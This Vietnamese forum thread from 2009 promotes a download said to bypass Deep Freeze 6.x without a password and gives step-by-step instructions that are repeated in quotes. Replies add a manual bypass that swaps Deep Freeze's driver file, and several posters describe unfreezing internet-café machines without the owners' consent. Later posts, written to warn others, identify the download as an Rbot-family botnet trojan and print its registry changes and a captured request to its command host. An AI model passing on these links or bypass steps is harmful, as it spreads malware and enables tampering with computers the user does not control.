PDA

View Full Version : Phá DeepFreeze 6.x Trong 5 giây - New !!!!!



Hoang Chien
11-07-2009, 22:34
Gỡ bỏ DeepFreeze 6.x Không cần pass
Có thể vào Menu quản lý cua DeepFree mà không cần mật khẩu
Cách sử dụng :



Link download :http://ketnoisinhvien.net/bieutuong/download.gif (http://ketnoisinhvien.net/forum/attachment.php?aid=100&k=d50fd497c7f0f65c32ca015c53f66b7e&t=1247325643&fid=90&sid=f62etcAtqLYUehw5QKbqC2rSkoiiZj9Wm27YREOGhmSMmJ I)
Link down dự phòng:http://ketnoisinhvien.net/bieutuong/download.gif (http://www.mediafire.com/?mn0ijdh0nad)
pass giải nén : ketnoisinhvien.net

Sau Khi giải nén
chạy file DeepFree.sfx để tiến hành gỡ bỏ deep freeze
Bấm vào nút Login để đăng nhập với tài khoản có sẵn
Tiếp tục nhấn vào nút ***** để bắt đầu . Bấm vào nút ***** 1 lần nữa để hoàn tất.
Bây giờ bạn dùng tổ hợp phím Crtl + Alt + Shift + F6 để mở deep free
Hiện ra bảng login. bạn không cần điền mật khẩu mà sẽ nhấn vào OK để vào thẳng Menu của chúng
Boot Frozen : Đóng băng
Boot Thawed on next 1: Mở không đóng băng sau 1 lần khởi động lại máy
Boot Thawed : Gỡ bỏ đóng băng vĩnh viễn

Các bạn chọn 1 trong các lựa chọn trên rồi nhấn OK và restart lại máy
Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường

Hướng dẫn Bằng ảnh
http://ketnoisinhvien.net/upload/files/xfuuzp0baw6o315ufdqg.png
Bấm vào Login để tiếp tục
http://ketnoisinhvien.net/upload/files/6wcieohu53m1lq8npbhb.png
Bấm vào ***** để bắt đầu
http://ketnoisinhvien.net/upload/files/uith0pxp6htg302vm142.png
Tiếp tục bấm vào ***** sẽ đc như hình
http://ketnoisinhvien.net/upload/files/r48pfxfcnuxb55bsqupv.png

Bây giờ bạn dùng tổ hợp phím Crtl + Alt + Shift + F6 để mở deep free
Hiện ra bảng login. bạn không cần điền mật khẩu mà sẽ nhấn vào OK để vào thẳng Menu của chúng
Boot Frozen : Đóng băng
Boot Thawed on next 1: Mở không đóng băng sau 1 lần khởi động lại máy
Boot Thawed : Gỡ bỏ đóng băng vĩnh viễn

Các bạn chọn 1 trong các lựa chọn trên rồi nhấn OK và restart lại máy
Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường

conan52
12-07-2009, 01:38
cái phá pass này hay thỳ hay thật nhưng sao bác k upload lên trang nào dễ download ấy đã là chia sẻ sao cứ phải bắt người ta ghé thăm web của mình. Ghé thăm cũng chẳng sao nhưng mà ghé thăm đăng ký thành viên rồi mà lại thiếu danh vọng để mờ download quả thật làm ng khác phải........ Bác nào download đc upload lên trang khác cho A E download test thử phát

qthaiduongvnn
12-07-2009, 06:24
Ai lười đăng ký như mình thì tải tại đây nhé http://www.mediafire.com/download.php?tztmt1jm4bx

hongvan_itc
12-07-2009, 15:18
các bác thông cảm ! em nó mới làm 4r ! cần tăng rank :D

vanquyenhp
12-07-2009, 20:51
Bác ơi, em down về máy, giải nén ra thì KIS thấy có virus.
Cái này bác dùng = vb6 để viết à?

lambanmai8283
12-07-2009, 21:58
Lừa bịp. Tải về, giải nén ra là 1 đống virus. KAV và Avira cảnh báo liên tục.
Chẳng biết thế nào, nhưng nếu quên pass. Các bạn có thể vô hiệu hóa Deep 6.x bằng cách sau:
- Vào ms dos, nếu không thạo Dos thì có thể vào Mini XP từ đĩa Hiren >9.7
- Tìm đường dẫn \\Windows\system32\driver
- Copy file Disk.sys trong đó ra 1 nơi nào đó, đổi tên thành DeepFrz.sys
- Xóa file DeepFrz.sys có sẵn trong \\Windows\system32\driver
- Copy file DeepFrz.sys vừa đổi tên kia quay lại \\Windows\system32\driver
Khởi động lại máy, bạn sẽ thấy Deep bị vô hiệu hoá
Giải thích: Lúc bình thường, Deep sẽ tạo 1 phân vùng ảo trên sự điều khiển của DeepFrz.sys
Bây giờ, nó chịu sự điều khiển của Disk.sys như Windows thông thường.

tungoso
12-07-2009, 22:24
Lừa bịp. Tải về, giải nén ra là 1 đống virus. KAV và Avira cảnh báo liên tục.
Chẳng biết thế nào, nhưng nếu quên pass. Các bạn có thể vô hiệu hóa Deep 6.x bằng cách sau:
- Vào ms dos, nếu không thạo Dos thì có thể vào Mini XP từ đĩa Hiren >9.7
- Tìm đường dẫn \\Windows\system32\driver
- Copy file Disk.sys trong đó ra 1 nơi nào đó, đổi tên thành DeepFrz.sys
- Xóa file DeepFrz.sys có sẵn trong \\Windows\system32\driver
- Copy file DeepFrz.sys vừa đổi tên kia quay lại \\Windows\system32\driver
Khởi động lại máy, bạn sẽ thấy Deep bị vô hiệu hoá
Giải thích: Lúc bình thường, Deep sẽ tạo 1 phân vùng ảo trên sự điều khiển của DeepFrz.sys
Bây giờ, nó chịu sự điều khiển của Disk.sys như Windows thông thường.

cũng hay, nhưng giờ toàn format theo NTFS hết rồi mà

lambanmai8283
13-07-2009, 06:26
cũng hay, nhưng giờ toàn format theo NTFS hết rồi mà

NTFS thì làm trong XPE hoặc mini XP, không dưng mà từ Hiren >9.7 lại có mini XP. Phải không bạn?

[=========> Bổ sung bài viết <=========]

Nguyên nhân có Virus trong chương trình của bạn đã được làm rõ: 1 Spywave đưa định hướng kết nối tới trang chủ của 4r http://ketnoisinhvien.net/forum/attachment.php?aid=100&k=d50fd497c7f0f65c32ca015c53f66b7e&t=1247325643&fid=90&sid=f62etcAtqLYUehw5QKbqC2rSkoiiZj9Wm27YREOGhmSMmJ I
Đoạn code đó cắt đi thì không còn Virus nữa. Các bạn có thể tải về tại đây
Link: http://www.mediafire.com/?sharekey=fc1cd2f2709965ac19747bd91027d4dd124e38dc 38270b25

superthin
13-07-2009, 08:38
Bố khỉ, thử chạy trong môi trường Linux thì cái file chết tiệt kia không thèm chạy, nó bảo thiếu file .dll gì ấy, cái này mà ngồi "nghịch" cho ra cũng hơi bị phê àh nghen.

conan52
13-07-2009, 12:20
mình nghĩ admin của http://ketnoisinhvien.net đã thêm bớt vào trong đó. chứ thực ra bản gốc không hề có.
mình đã đem ra quán và test thử 2 máy và đã thành công
đề nghị tảy chay http://ketnoisinhvien.net

Phần mềm này tính năng rất hay nhưng chẳng biết tình hình thế nào nhưng mờ cài xong phát BIS 2009 báo virus liên tục xóa luôn cái file setup. Tắt BIS 2009 đi cài ra 1 lúc sau thấy iternet bảo là: Tao gét cái thằng mày vừa cài , và thế là phải ghost lại :(

MayTinhBachKhoa
13-07-2009, 12:52
Các bác ơi. Tóm lại là em vẫn hổng hỉu cơ chế của Deep là gì ? Làm sao mà nó bít mọi thao tác của mình với máy mà nó khôi phục lại được khi Reset là sao nhỉ ? Ví thử như mình xóa đi một File thật lớn, cỡ mấy Gigabyte. Liệu nó có cho quay trở lại được ko ? (Dùng 1 trình xóa tận gốc ấy ạ). Nếu chỉ thay đổi File Disk.sys, có vẻ đơn giản quá ?

hongvan_itc
13-07-2009, 14:49
mình nghĩ admin của http://ketnoisinhvien.net đã thêm bớt vào trong đó. chứ thực ra bản gốc không hề có.
mình đã đem ra quán và test thử 2 máy và đã thành công
đề nghị tảy chay http://ketnoisinhvien.net

bác pro thế sao còn down ? mấy cái này là tụi em chịu khó ngày đêm qua mấy site bên nước ngoài chôm về ! làm sao tránh khỏi VR và TG ?! và dùng cái này phần lớn là dùng ngoài tiệm nét ! cần cái soft nào đó để sài ! còn máy bác dùng ở nhà làm gì ? muốn đú hay sao ? ai ép chứ ? làm như là ! tẩy chay cái con khỉ mốc.! bực cả mình !

hongvan_itc
13-07-2009, 15:07
vậy sao còn kêu ? ra quán muốn phá deep chết gà đi dc ! còn kêu ca cái gì ? mà không hiểu vì sao bác đòi tẩy chay ketnoisinhvien.net là sao ? !

hongvan_itc
13-07-2009, 15:17
vì thế mà tẩy chay ! hay quá ha ?! quyền ng ta mà ? thêm cái con khỉ ! ông giỏi thì ông viết cái khác đi !

hongvan_itc
13-07-2009, 15:35
tôi nói là tôi làm hổi nào ? tôi nói tại sao ông muốn tẩy chay KNSV ??????????? ông nghĩ ông là ai ? ông tưởng xây dựng lên một 4r dễ lắm đó hả ?! bao nhiêu công sức, tâm huyết của chúng tôi mà ông kêu " tẩy chay " là sao ????????????????

hongvan_itc
13-07-2009, 15:49
xin hồn ! ông giỏi ông kiếm đâu đc cái thứ 2 tui đi bằng đầu cho ông xem !

hongvan_itc
13-07-2009, 16:04
hơ hơ hơ ! xin ông đừng nói nữa ! càng nói càng ngu ! cái này là của thằng bạn tôi nó viết ! cái thằng up bài này đó !!!!! hiểu chưa ........!

VipQBoy
13-07-2009, 16:19
=)) Bạn cậu nick name là gì, ở group nào, sao thằng bạn tớ nó cũng nhận là code cái này thế nhẩy :)). Có khi người quen cũng nên nè

lambanmai8283
13-07-2009, 22:36
Đây là chỗ cãi nhau à?
Nếu muốn tranh cãi, vui lòng offline, ra quán trà đá.

[=========> Bổ sung bài viết <=========]


Gỡ bỏ DeepFreeze 6.x Không cần pass
Có thể vào Menu quản lý cua DeepFree mà không cần mật khẩu
Cách sử dụng :



Link download :http://ketnoisinhvien.net/bieutuong/download.gif (http://ketnoisinhvien.net/forum/attachment.php?aid=100&k=d50fd497c7f0f65c32ca015c53f66b7e&t=1247325643&fid=90&sid=f62etcAtqLYUehw5QKbqC2rSkoiiZj9Wm27YREOGhmSMmJ I)
Link down dự phòng:http://ketnoisinhvien.net/bieutuong/download.gif (http://www.mediafire.com/?mn0ijdh0nad)
pass giải nén : ketnoisinhvien.net

Sau Khi giải nén
chạy file DeepFree.sfx để tiến hành gỡ bỏ deep freeze
Bấm vào nút Login để đăng nhập với tài khoản có sẵn
Tiếp tục nhấn vào nút ***** để bắt đầu . Bấm vào nút ***** 1 lần nữa để hoàn tất.
Bây giờ bạn dùng tổ hợp phím Crtl + Alt + Shift + F6 để mở deep free
Hiện ra bảng login. bạn không cần điền mật khẩu mà sẽ nhấn vào OK để vào thẳng Menu của chúng
Boot Frozen : Đóng băng
Boot Thawed on next 1: Mở không đóng băng sau 1 lần khởi động lại máy
Boot Thawed : Gỡ bỏ đóng băng vĩnh viễn

Các bạn chọn 1 trong các lựa chọn trên rồi nhấn OK và restart lại máy
Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường

Hướng dẫn Bằng ảnh
http://ketnoisinhvien.net/upload/files/xfuuzp0baw6o315ufdqg.png
Bấm vào Login để tiếp tục
http://ketnoisinhvien.net/upload/files/6wcieohu53m1lq8npbhb.png
Bấm vào ***** để bắt đầu
http://ketnoisinhvien.net/upload/files/uith0pxp6htg302vm142.png
Tiếp tục bấm vào ***** sẽ đc như hình
http://ketnoisinhvien.net/upload/files/r48pfxfcnuxb55bsqupv.png

Bây giờ bạn dùng tổ hợp phím Crtl + Alt + Shift + F6 để mở deep free
Hiện ra bảng login. bạn không cần điền mật khẩu mà sẽ nhấn vào OK để vào thẳng Menu của chúng
Boot Frozen : Đóng băng
Boot Thawed on next 1: Mở không đóng băng sau 1 lần khởi động lại máy
Boot Thawed : Gỡ bỏ đóng băng vĩnh viễn

Các bạn chọn 1 trong các lựa chọn trên rồi nhấn OK và restart lại máy
Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường

Cái này làm trên DF6 Enterprise tại các quán Net không có hiệu quả.

SeekerSC
13-07-2009, 22:41
quản cáo dữ quá ............

Zekan
13-07-2009, 23:29
Cách hướng dẫn làm deep freeze bị melt ra là vào www.google.com , gõ vào từ khóa "breaking deep freeze " ,đừng hỏi tại sao đầy đường :D

duykhuong-it
14-07-2009, 05:59
em xài Undeepfeze phá Deepfeze thấy vẫn tốt, vả lại sử dụng không mất công như cái này

conan52
14-07-2009, 13:38
tình hình là cãi nhau cái gì. Chuyên ai lấy làm,việc ai lấy lo. 2 ông cãi nhau như hai thằng điên ấy làm loạn diên đàn.Cứ như kiểu 1 ng là chủ cái 4r ấy 1 ng la kẻ thù của cái 4r ấy. >:P cái ng post bài còn chưa nói gì có ng đã hóng hộ rồi ;lo

lambanmai8283
14-07-2009, 21:54
em xài Undeepfeze phá Deepfeze thấy vẫn tốt, vả lại sử dụng không mất công như cái này

Undeep chỉ có tác dụng với DF5 và DF 6 standar thôi. DF 6.x Enterprise thì không được đâu bạn ah. Kể cả phần mềm được quảng cáo trong topic này.

rồng xanh
15-07-2009, 04:13
Có thể sử dụng soft Undeep Freeze để phá cũng đc , vừa nhanh vừa gọn , chỉ cần 1 click

hqtb84
16-07-2009, 22:01
Có thể sử dụng soft Undeep Freeze để phá cũng đc , vừa nhanh vừa gọn , chỉ cần 1 click
chỉ đc bản 5 vể trc thui. còn bản 6 thì chịu.
Mà công nhận khi giải nén là Avira nó báo VR + Trojan thật.
Tui đã gỡ Avira để test thấy hoàn toàn thành công nhưng ko biết sau đó mấy con VR + Trojan kia có làm thịt máy mình ko nữa

sonynhoc
27-07-2009, 06:17
ĐM thì ra thằng nhóc chơi quán nét mình dùng cái này để mở băng , tưởng nó có tài gì chứ , mẹ phải đổi soft khác để đóng băng rồi , DM nó lần sau vô tiệm phá nửa chắc tui Bem nó gảy răng

hqtb84
27-07-2009, 07:23
ĐM thì ra thằng nhóc chơi quán nét mình dùng cái này để mở băng , tưởng nó có tài gì chứ , mẹ phải đổi soft khác để đóng băng rồi , DM nó lần sau vô tiệm phá nửa chắc tui Bem nó gảy răng
làm j mà gay gắt thế bạn.
cứ để họ chơi, có điều mình để mắt đến họ thôi

cavang125
27-07-2009, 07:36
Undeep chỉ có tác dụng với DF5 và DF 6 standar thôi. DF 6.x Enterprise thì không được đâu bạn ah. Kể cả phần mềm được quảng cáo trong topic này.


test chưa mà la làng vậy pa ?

con down về xài rồi, ok lắm, trên các máy P IV thì ok còn em test trên con PIII của em thì nó dump xanh lè (khởi động lại thì vẫn còn đóng băng)

gio_huy_hoang
27-07-2009, 07:58
Nhớ lại hồi cứ dùng cái này để phá băng máy quán mà down phim, chủ quán rượt chạy không kịp ^^

cavang125
27-07-2009, 08:30
Undeep chỉ có tác dụng với DF5 và DF 6 standar thôi. DF 6.x Enterprise thì không được đâu bạn ah. Kể cả phần mềm được quảng cáo trong topic này.


mẹ chúng mày ngu như chó ấy phá phiên bản 6 trở xuốnng thì dùng UNdeep còn 6 trở lên thì đào mả chung chúng mày lên cũng không phá được



test chưa mà la làng vậy pa ?

con down về xài rồi, ok lắm, trên các máy P IV thì ok còn em test trên con PIII của em thì nó dump xanh lè (khởi động lại thì vẫn còn đóng băng)


bộ không đọc bài viết hả ??


@ ANH TUAN 9381 yêu cầu lịch sự trong diễn đàn !

lambanmai8283
27-07-2009, 08:55
Gỡ bỏ DeepFreeze 6.x Không cần pass
Có thể vào Menu quản lý cua DeepFree mà không cần mật khẩu

Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường
Chỗ này chính là điểm sai lệch, đây chính là việc làm để cái virus vào máy. Thực tế cái này là thêm bớt, bản gốc tiếng Anh không có.

bộ không đọc bài viết hả ??

Cavang thử luợn vào link sau lấy cái bản này về thử xem có phá được không nhé http://www.mediafire.com/?ltmnlwzgwrv

conan52
27-07-2009, 14:10
mẹ chúng mày ngu như chó ấy phá phiên bản 6 trở xuốnng thì dùng UNdeep còn 6 trở lên thì đào mả chung chúng mày lên cũng không phá được

Thanh niên này k biết gì về điện ah` =)) Mà có phá đc í cũng chả giám chơi đâu cái PC nhà tớ nó già rồi chịu chả giám test đâu. Virus nó thịt :khoc:

hongvan_itc
28-07-2009, 09:18
không có đâu ! đây chỉ là con VR nó dẫn đến KNSV thôi ! thật ra nó không có hại gì cả ;))
còn các bác nói thằng chủ toppic chưa nói gì mà em đã cãi giúp nó thì là vì có 2 lí do khiến em phải lên tiếng :
thứ 1 : thằng đó nó nói " tẩy chay KNSV "
thứ 2 : em là admin của KNSV !
các bác thấy sao khi thằng khùng nào đó đòi tẩy chay công sức của các bác ?!
và con VR chỉ là dẫn đến KNSV mà thôi ! nếu có một cái soft độc nào đó mà các bác có liệu các bác có làm như vậy không ?
thằng chủ toppic là đứa bạn em , nó cũng làm KNSV với em mà !
em thừa nhận mục đích cảu cái này phần lớn là quảng cáo !
nếu các bác cảm thấy tụi em có lỗi thì DEL cái bài này đi cũng được !

lambanmai8283
28-07-2009, 11:53
eo các dại ca toàn nhận tài về mình thế bác nào viết ra mời anh em đi mát xoa sau la một buổi nhé để anh em đỡ búc xúc hihihihi em kém tài lên luôn ủng hộ các dca viết thiệt nhiều cái mới chó dân đen bọn em dùng. Bác Lam Ban Mai hom nào lên BN đi ưồng trà đá nhé kekkekekek :)

OKe, cảm ơn chú, viết nhanh phần mềm cái đề tài A giao cho đi, không có A cho điểm liệt đấy.

[=========> Bổ sung bài viết <=========]


không có đâu ! đây chỉ là con VR nó dẫn đến KNSV thôi ! thật ra nó không có hại gì cả ;))


Hồng Vân ơi, chương trình này là 1 con Virus chính hiệu. Khi chạy, nó tạo ra mã độc trong tập tin ntndis.exe nằm trong \\system32\driver\ntndis.exe của Windows
Thực tế thuộc dòng virus W32/Rbot-DPG
Được ghi vào Regedit như sau:
HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \WindowsNT \CurrentVersion \Winlogon \Shell
Ai đã thử mà bị dính nó, có thể copy file này từ máy lành, đè lên file bị nhiễm của máy mình. (nhớ làm trong safe mode)
Ai quan tâm có thể tham khảo tại đây: http://translate.google.com.vn/translate?hl=vi&sl=en&u=http://www.bleepingcomputer.com/startups/ntndis.exe-14934.html&ei=Uq5uSuOlH9K9kAWA_8HBBQ&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3Dntndis.exe%26hl%3Dvi

cavang125
29-07-2009, 08:10
Chỗ này chính là điểm sai lệch, đây chính là việc làm để cái virus vào máy. Thực tế cái này là thêm bớt, bản gốc tiếng Anh không có.


Cavang thử luợn vào link sau lấy cái bản này về thử xem có phá được không nhé http://www.mediafire.com/?ltmnlwzgwrv

vẫn phá dc bác ạ:no:

mỗi cái là khi chạy, phải tắt avira. nó mới update. vô là bị băm hết. bữa trước thỉ không có vụ này. hic hic. có trojan đấy, cẩn thận nhé

http://chiase.anhso.net/as/09/07/29/unde542542.jpg

http://chiase.anhso.net/as/09/07/29/unde997197.jpg

http://chiase.anhso.net/as/09/07/29/unde653653.jpg

PhuCuongSPI
29-07-2009, 10:06
Thôi đi các Bác ơi. Đã là chương trình share rồi, dùng được thì dùng, không thì thôi. Nặng lời với nhau làm chi cho mất vui thế :(

anhcongcham
29-07-2009, 10:54
sao em cài file undeepfreeze nó lại bắt điền mật khẩu vào hộp nhj??????
nản quá mong các anh giúp em sớm cảm ơn

dunggttn
30-07-2009, 21:02
Theo như bác Tam QUốc thì con này chính là 1 con botnet anh em tẩy chay nó đi.
Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường
]Lý do là sau khi phá được Deep Freeze thì bắt ta phải chạy lại là để cho máy dính lại con trojan
- Con này cũng có khả năng rootkit
- File driver của nó tên ntndis.sys trong thư mục %Windir%\system32\drivers
- Nó tạo ra 1 service tên là ntndis, chế độ run: Auto, đường dẫn chính là file ntndis.sys (%Windir%\system32\drivers\ntndis.sys)
- Cũng trong thư mục %Windir%\system32\drivers có file ntndis.exe được thêm vào key khởi động trong Registry. Nó chạy file ntndis.exe (để open port 22580) thông qua file explorer.exe nên sẽ rất khó nhận ra
- Thêm chương trình của nó (ở đây là file vp.exe) vào Exceptions của Windows Firewall như vậy là nó có thể tự do hoạt động . Cũng thêm Explorer.exe vào Exceptions luôn lý do vì sao phải thêm Explorer.exe vào thì xem ở trên đã rõ
- Còn nhiều thứ từa lưa nữa, nhưng thôi bây giờ là đến phần nó connect ra bên ngoài đây mới là phần quan trọng nà
- Connect đến camap.myvnc.com (có ip là 74.53.86.114)
- Đây là 1 đoạn nhỏ được Capture lại

POST /camap/?act=online&s4=0&s5=25580&nickname=eHBfc3AyTkVUWzM 3NTIwOV0= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Host: camap.myvnc.com
Content-Length: 10
Connection: Keep-Alive
Cache-Control: no-cache

msg_out=
HTTP/1.1 200 OK
Date: Sun, 19 Jul 2009 03:15:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

conan52
31-07-2009, 03:59
Theo như bác Tam QUốc thì con này chính là 1 con botnet anh em tẩy chay nó đi.
Chú ý : sau khi khởi động lại máy bắt buộc bạn phảichạy lại phần mêm UndeepFree để cho windows có thể hoạt động trở lạibình thường
]Lý do là sau khi phá được Deep Freeze thì bắt ta phải chạy lại là để cho máy dính lại con trojan
- Con này cũng có khả năng rootkit
- File driver của nó tên ntndis.sys trong thư mục %Windir%\system32\drivers
- Nó tạo ra 1 service tên là ntndis, chế độ run: Auto, đường dẫn chính là file ntndis.sys (%Windir%\system32\drivers\ntndis.sys)
- Cũng trong thư mục %Windir%\system32\drivers có file ntndis.exe được thêm vào key khởi động trong Registry. Nó chạy file ntndis.exe (để open port 22580) thông qua file explorer.exe nên sẽ rất khó nhận ra
- Thêm chương trình của nó (ở đây là file vp.exe) vào Exceptions của Windows Firewall như vậy là nó có thể tự do hoạt động . Cũng thêm Explorer.exe vào Exceptions luôn lý do vì sao phải thêm Explorer.exe vào thì xem ở trên đã rõ
- Còn nhiều thứ từa lưa nữa, nhưng thôi bây giờ là đến phần nó connect ra bên ngoài đây mới là phần quan trọng nà
- Connect đến camap.myvnc.com (có ip là 74.53.86.114)
- Đây là 1 đoạn nhỏ được Capture lại

cái này mới đây để xem nào

hongvan_itc
01-08-2009, 18:53
em tách đc VR rồi ! dung lượng còn có 128k à ! bác bào mún pm em phát !

lambanmai8283
01-08-2009, 22:42
em tách đc VR rồi ! dung lượng còn có 128k à ! bác bào mún pm em phát !

Biến thể mới hả? Vụ này có lẽ stop thôi.

umihira
01-08-2009, 23:02
Các bác xài tool để theo dõi malware hay xem code của chương trình trên vậy?
Có phải kết hợp các tool Proces***plorer, Autorun, Hjackthis, TCPIP View phải ko?

doi2009
06-10-2009, 18:05
Em tải về thì được rùi nhưng khi giải nén nó lại xuất hiện hộp thoại enter password là sao? có ai giúp em không?
Em dang can gap lam chet nguoi day?

littlejae
15-10-2011, 15:24
ôi sao ko có chỗ dơn vậy????

hoangsaviet.com
15-10-2011, 19:14
Mấy cái này phá cung đơn giản quá ha